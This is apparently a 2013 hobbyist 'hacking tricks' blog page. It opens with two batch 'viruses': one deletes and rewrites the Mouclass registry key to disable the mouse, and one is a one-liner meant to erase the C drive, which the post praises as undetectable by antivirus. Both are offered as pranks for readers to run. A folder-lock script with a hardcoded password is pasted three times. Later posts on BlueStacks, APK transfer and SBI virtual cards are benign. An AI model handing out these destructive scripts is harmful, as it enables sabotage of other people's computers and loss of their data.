Saturday 12 October 2013

Create Virus To disable Mouse


Mouse is One of The most Important part of your computer and not working of this may make your mind frustrated.


How to Create this Virus




  • Open Notepad and copy below codes

   
rem ---------------------------------
    rem Disable Mouse
    set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"
    reg delete %key%
    reg add %key% /v Start /t REG_DWORD /d 4
    rem ---------------------------------
 


  • Save this file as  virus.bat 
  • Done you just created your virus.

 Double Clicking on virus.bat file will disable your mouse.

You may Be interested in:
        Creating A dangerous Virus 
                    or
        Locking Folder With Password

How to make a Dangerous Virus

Your are a minute before to create the dangerous virus you must have ever seen!!!


This Virus is bieng created by using batch file programming. 

This virus will delete the C Drive completely. The good thing about this virus is that it is not detected by antivirus. 



How to Make the virus ?

  • Open Notepad and copy below code into it.

   
@Echo off
    Del C:\ *.* |y


  • Save this file as virus.bat (Name can be anything but .bat is must)
  • Now, running this file will delete all the content of C Drive.


Warning: Try at your own risk



Yoy may be intrested in

                    Create Virus To Disable Mouse
                                          
                            

Password Protect Any Folder

Again Some time you have some sensible and much important files to protect and to keep safely it on your PC.

Here is the intresting trick how to lock the folder with a password without any software.



Steps to Create Folder Lock


  • Open Notepad and Copy code given below into it.



    cls
    @ECHO OFF
    title avkfreedom.blogspot.com
    if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK
    if NOT EXIST MyFolder goto MDMyFolder
    :CONFIRM
    echo Are you sure to lock this folder? (Y/N)
    set/p "cho=>"
    if %cho%==Y goto LOCK
    if %cho%==y goto LOCK
    if %cho%==n goto END
    if %cho%==N goto END
    echo Invalid choice.
    goto CONFIRM
    :LOCK
    ren MyFolder "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
    attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
    echo Folder locked
    goto End
    :UNLOCK
    echo Enter password to Unlock Your Secure Folder
    set/p "pass=>"
    if NOT %pass%== avkfreedom goto FAIL
    attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
    ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" MyFolder
    echo Folder Unlocked successfully
    goto End
    :FAIL
    echo Invalid password
    goto end
    :MDMyFolder
    md MyFolder
    echo MyFolder created successfully
    goto End
    :End

cls
@ECHO OFF
title coolhacking-tricks.blogspot.com
if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK
if NOT EXIST MyFolder goto MDMyFolder
:CONFIRM
echo Are you sure to lock this folder? (Y/N)
set/p "cho=>"
if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid choice.
goto CONFIRM
:LOCK
ren MyFolder "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
echo Folder locked
goto End
:UNLOCK
echo Enter password to Unlock Your Secure Folder
set/p "pass=>"
if NOT %pass%== coolhacks goto FAIL
attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" MyFolder
echo Folder Unlocked successfully
goto End
:FAIL
echo Invalid password
goto end
:MDMyFolder
md MyFolder
echo MyFolder created successfully
goto End
:End - See more at: http://www.coolhackingtrick.com/2013/04/password-protect-any-folder-without-any.html#sthash.nvTzvfGX.dpuf
cls
@ECHO OFF
title coolhacking-tricks.blogspot.com
if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK
if NOT EXIST MyFolder goto MDMyFolder
:CONFIRM
echo Are you sure to lock this folder? (Y/N)
set/p "cho=>"
if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid choice.
goto CONFIRM
:LOCK
ren MyFolder "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
echo Folder locked
goto End
:UNLOCK
echo Enter password to Unlock Your Secure Folder
set/p "pass=>"
if NOT %pass%== coolhacks goto FAIL
attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" MyFolder
echo Folder Unlocked successfully
goto End
:FAIL
echo Invalid password
goto end
:MDMyFolder
md MyFolder
echo MyFolder created successfully
goto End
:End - See more at: http://www.coolhackingtrick.com/2013/04/password-protect-any-folder-without-any.html#sthash.nvTzvfGX.dpuf
cls
@ECHO OFF
title coolhacking-tricks.blogspot.com
if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK
if NOT EXIST MyFolder goto MDMyFolder
:CONFIRM
echo Are you sure to lock this folder? (Y/N)
set/p "cho=>"
if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid choice.
goto CONFIRM
:LOCK
ren MyFolder "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
echo Folder locked
goto End
:UNLOCK
echo Enter password to Unlock Your Secure Folder
set/p "pass=>"
if NOT %pass%== coolhacks goto FAIL
attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" MyFolder
echo Folder Unlocked successfully
goto End
:FAIL
echo Invalid password
goto end
:MDMyFolder
md MyFolder
echo MyFolder created successfully
goto End
:End - See more at: http://www.coolhackingtrick.com/2013/04/password-protect-any-folder-without-any.html#sthash.nvTzvfGX.dpuf

  • Save the notepad file as lock.bat (.bat is must)
  • Now double click on lock.bat and a new folder will be created with name MyFolder
  • Copy all your data you want to protect in that New folder
  • Now double click on lock.bat and when command promp appears Type Y and press enter.
  • Now MyFolder will be hidden from you view, to access that folder double click on lock.bat 
  • It will ask for password enter your password and done. (Default password is avkfreedom


NOTE-Here the Default Password Is"avkfreedom"

 For Further Security- Copy Your LOCK.BAT file in some secure place or in pendrive.

Feel free to comment below..

 

Monday 7 October 2013

Create Non-Deletable And Non-Renameable Folder

Some time you have some sensible and much important files to protect and to keep safely it on your PC.

Here is a trick to create a folder which neither can be deleted nor can be renamed.


Trick is that you have to make the folder with name which are reserved words in windows. You have to use only these names to create the folder. These names are-    


[ con, aux, lpt1, lpt2, lpt3 to lpt9 ]



Steps To Create Non-deleteable And Non-renameable Folder




  • Go to start and click on RUN.
  • Type "cmd" and hit ENTER.
  • In the cmd window type C: or D: and hit enter.(You can't create this type folder in the drive where windows is installed generally C:)
  • Type md con\ and hit enter (md - make directory)
  • You may use other words such as aux, lpt1, lpt2, lpt3 up to lpt9 instead of con in above step.
  • Open that directory, you will see the folder created of name con.
  • Try to delete that folder or rename that folder windows will show the error message. 


How to delete such files

It is not possible to delete that folder manually but you can delete this folder by another way mentioned below.


  • Open Command Prompt
  • Type D: ( if u created this type of folder in D: drive) & hit enter
  • Type rd con\ (rd - remove directory)
  • Open that directory and the folder will not appear because it is removed.

Friday 27 September 2013

Whats App on PC

!!!!AMAZED!!!!!

 

But its true you can have Whats App on you computer and laptop.

With Bluestack all android apps runs on windows or Linux operating system in the same way as they run on your phone.

Follow the following steps:  

  • BLUESTACK provide interference between all android apps and your computer.

    CLICK TO DOWNLOAD BLUESTACK

 

  • Choose the correct operating system download and install bluestack on your computer.

  •  Now install whats app directly via bluestack search manager or install by APK while of whats apk.

  CLICK HERE IF YOU DO NOT KNOW HOW TO MAKE APK OF WHATS APP 

 

  • After installing the whats app open it on bluestack and enjoy chatting with your friends.

    Feel free to comment below!

 

Transfer Android Apps Between Phones Over Bluetooth(APK)

Its the era of ANDROID and the only place where you can get all of your android apps is Google play.

 

So why to install same app angain angain from google play?????

 

You can backup all your app installed on your phone as a APK file and use this APK file to install the same in future. Even you can transfer installed app on your mobile to other phone by Bluetooth


Astro is a leading file explorer for Android, and I am sure most of you have come across it. Undoubtedly, it is one of the best Android file explorers one can use, but there’s a lot more to it than that. One of the features of Astro is that it lets you backup your installed apps on the memory card as an APK file so that you can restore them at the time of crisis. What we will do is, we will see how we can create an APK of an individual file and send it over Bluetooth to another device using this tool.

Steps to Send App APKs Over Bluetooth

  • After you have downloaded and installed Astro on your Android, run the application, press the settings soft key and select tools to open a pop-up window.

Astro  (2)


  • Select Application Backup from the popup tool window and wait for Astro to make a list of all the applications installed on your Android. In the list select the application you want to send over Bluetooth and click the backup button to create the APK file. You can select multiple applications as well. Once the backup is complete, press the back soft key to return to the Astro Home.


  • On the home screen, you will see all the files and folders in your mounted SD card. Navigate to the folder Backups—>Apps to find the APK files you have created above.

Astro  (1)
  • Well, our journey with Astro completes here. We will now use Bluetooth File Transfer app for Android to transfer these files over Bluetooth as APK access to Bluetooth are locked by default on most of the devices. Once you have downloaded and installed Bluetooth File Transfer app on your Android, launch the application.

  • In Bluetooth File Transfer application, navigate to the same folder Backups—>Apps and select the file you want to send. After selecting press the Bluetooth button, search for the device and send the file. Once the receiver receives the file, he will be able to install it.

Bluetooth FIle Transfer  (2)
  • Select the app which you want to send.
    • Above are the simple way to transfer via bluetooth..










     If you face any problem comment below.

    ANDROID APPS AND GAMES ON COMPUTER

    !!!!AMAZED!!!!!

     

      

    But its true you can have all your apps as well as games on your computer and even you can run all of these apps on your pc or laptop as the run on your android phone!!!!

    BLUESTACK provide interference between all android apps and your computer. 

    Just download Bluestack and install it on your computer.and your are done.

                            CLICK TO DOWNLOAD BLUESTACK

    Get the apk file ,install them and go or you can also have files downloaded vi Bluestack interference which need internet connection.

    You may be intrested in:

                                 WHATS APP ON PC

    If you face any problem comment below.

    Tuesday 27 August 2013

    Virtual Card Demo:



    FOR FAQ CLICK HERE
    I. Card Creation / generation:

    Step 1: Visit SBI Internet Banking (https://www.onlinesbi.com/) and click on Login of Personal Banking






    Step 2: Login on using User Name and Password (Advisable to use Online Virtual Keyboard).





    Step 3: Click on “e-Card” tab and select “State Bank Virtual Card” option






    Step 4: Select the appropriate Account No. from the list and enter the amount for which you want
    a State Bank Virtual Card. Accept the Terms & Conditions and click on Generate.

    SBI vcc step1





    Step 5: Verify Card Holder Name, Debit Account No. and Virtual Card Limit. On re-verification of particulars/values click on Generate and in case of any error click on Back for correction.
    SBI vcc step2





    Step 6: 8-Digit One-Time-Password (OTP) will be sent to the mobile no. registered with Internet Banking. Enter the OTP received using virtual keyboard and click on Confirm.






    Step 7: State Bank Virtual Card will be generated and the Card image will be displayed in the screen, which contains Your Name, Card No, Limit, CVV and Expiry Date which you may please note down. The State Bank Virtual Card is now ready for e-commerce transactions.
    SBI VCC


    II. View generated/created State Bank Virtual Card details
    Step 1: Visit SBI Internet Banking (https://www.onlinesbi.com/) and click on Login of Personal Banking


    Step 2: Login on using User Name and Password (Advisable to use Online Virtual Keyboard).


    Step 3: Click on “e-Card” tab and select “State Bank Virtual Card” option


    Step 4: Click on Virtual Card Details. The screen will display all Virtual Cards created along with Card Number, Creation Date, Expiry Date, Limit Amount, Used Amount and Status.


    Step 5: Click on the specific Card No. which you want to view. On click the complete Card details viz. Name, Issue Date, Expiry, Merchant Name, CVV2, Limit Amount, Status, Source Account No. will be displayed on the screen.

    III. Cancel generated/created State Bank Virtual Card

    Step 1: Visit SBI Internet Banking (https://www.onlinesbi.com/) and click on Personal Banking

    Step 2: Login on using User Name and Password


    Step 3: Click on “Requests” tab and select “State Bank Virtual Card” option


    Step 4: Click on Cancel Virtual Card. Select the Virtual Card and click on Cancel.

    Step 5: Verify the Virtual Card No. you wanted to cancel and click on OK.


    Step 6: Confirmation message “Your Virtual Card number 466XXXXXX462 has been successfully cancelled.” will be displayed on the screen and the blocked amount will be credited back to the account, within an hour.


    FOR FAQ CLICK HERE

    Airport Authority of India AAI JE Previous Year paper

    I have tried to collect previous year paper of Airport Authority of India. AAI JE ATC PREVIOUS YEAR PAPER                            ...